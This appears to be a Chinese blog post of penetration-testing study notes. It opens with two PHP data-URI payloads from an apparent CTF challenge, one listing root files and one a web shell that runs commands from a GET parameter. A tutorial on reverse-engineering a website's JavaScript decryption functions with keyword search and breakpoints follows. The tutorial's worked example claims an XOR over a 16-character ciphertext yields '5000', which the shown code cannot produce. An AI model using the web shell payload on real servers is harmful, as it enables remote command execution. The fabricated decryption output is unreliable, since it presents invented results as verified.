signin

1
2
3
data:,<?=`nl %252F*`;
data:,<?=`$_GET[1]`;

渗透测试

这里学一下js逆向

在网页中找到对应的接口,分静态和动态

无混淆加密的定位方法:关键字搜索。

  1. 通过关键字搜索定位加密位置或解密位置

  2. 关键字需要具有独特性,不能是username或password这类通用英文单词

  3. 关键字特征:没有加解密能力(atob等);

  4. 1
    2
    3
    4
    5
    // 1. 关键字独特:INTRACT_data(不是通用词,是网站自定义的变量名)
    // 2. 关键字本身无解密能力:只是存了密文,自己不会解密
    let INTRACT_data = "98765abcde12345xyz"; // 密文,纯字符串,自己啥也干不了
    // 3. 外部有非内置/非类属的自定义解密函数包裹:kc()是网站自己写的解密方法(非浏览器自带)
    let plainText = kc(INTRACT_data); // kc()是网站自定义的解密函数,包裹了关键字

    完整例子

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    // 独特关键字:goods_price_encrypt(网站自定义,非通用)
    let goods_price_encrypt = "897sdf987sdf987"; // 密文,无解密能力
    // 自定义解密函数:decode_price(非内置、非类属)
    let real_price = decode_price(goods_price_encrypt); // 函数包裹关键字

    // 网站自己写的解密函数(核心)
    function decode_price(str) {
      // 自定义解密逻辑:比如先反转字符串,再转数字
      return Number(str.split("").reverse().join("")) / 100;
    }

搜出来的关键字排除.xxx的内容

1
2
3
4
5
6
7
8
9
10
11
12
13
// 无效格式(只是引用):INTRACT_data.content 只是取属性
let rawData = INTRACT_data.content; 

// 有效格式(解密处理):把引用的结果传给解密函数
let realData = decryptData(rawData); 

// 网站自定义的解密函数
function decryptData(str) {
  // 真实项目中可能是AES、RSA或自定义算法解密
  let key = CryptoJS.enc.Utf8.parse("1234567890abcdef");
  let iv = CryptoJS.enc.Utf8.parse("abcdef1234567890");
  return CryptoJS.AES.decrypt(str, key, { iv: iv }).toString(CryptoJS.enc.Utf8);
}

直接看概念看不懂,举个完整例子模拟流程

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
// 代码片段1:无效格式(关键字+.xxx,仅引用)
let response = await fetch("/api/stock?goods_id=10086");
let resData = await response.json();
let cipherText = resData.data.stock_encrypt; // 关键字.stock_encrypt → 只是取属性,无解密

// 代码片段2:有效格式(解密函数包裹变量)
let rawStock = cipherText; // 先赋值给变量
let realStock = decodeStock(rawStock); // 解密函数包裹变量 → 有效格式

//然后开始搜索decodeStock(rawStock)

// 代码片段3:网站自定义的解密函数(核心)
function decodeStock(str) {
  // 自定义解密逻辑:异或+转数字(模拟真实加密算法)
  let key = "goods_stock_2026"; // 解密密钥
  let result = "";
  for(let i=0; i<str.length; i++) {
    result += String.fromCharCode(str.charCodeAt(i) ^ key.charCodeAt(i%key.length));
  }
  return Number(result); // 库存是数字,最终转成数字返回
}

// 代码片段4:无效格式(关键字+.xxx,调用方法)
let test = resData.data.stock_encrypt.substr(2); // 只是截取字符串,无解密

然后进行断点调试

  1. 定位到 let realStock = decodeStock(rawStock); 这行代码,点击行号打断点(断点会显示为蓝色箭头);

  2. 刷新网页,浏览器会暂停在这个断点处(代码执行到这里会停);

  3. 查看变量值:

  • rawStock 的值是 897s987f897g897h(即 stock_encrypt 的密文);

  • 按「Step into」(F11)进入

    1
    decodeStock

    函数内部,一步步执行:

    • 异或运算后,result 先得到字符串 "5000"
    • 最后 return Number(result) 转成数字 5000
  1. 控制台验证:

在控制台输入 decodeStock("897s987f897g897h"),回车后返回 5000 → 确认 decodeStock 就是解密函数。

然后扣代码验证

  1. decodeStock 函数完整拷贝到本地新建的 decrypt.js 文件中;(如果有代码套代码的话需要一步一步调试)
  2. 在文件中添加测试代码,模拟解密:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
// 拷贝的核心解密函数
function decodeStock(str) {
  let key = "goods_stock_2026";
  let result = "";
  for(let i=0; i<str.length; i++) {
    result += String.fromCharCode(str.charCodeAt(i) ^ key.charCodeAt(i%key.length));
  }
  return Number(result);
}

// 测试:传入接口拿到的密文
let cipherText = "897s987f897g897h"; // 对应stock_encrypt的密文
let realStock = decodeStock(cipherText);
console.log("明文库存数:", realStock); // 输出:明文库存数:5000

  1. 运行验证:

    在终端执行

    1
    node decrypt.js

    ,输出

    1
    明文库存数:5000

    → 解密成功,完成 JS 逆向。

如有错误,多多指教

valine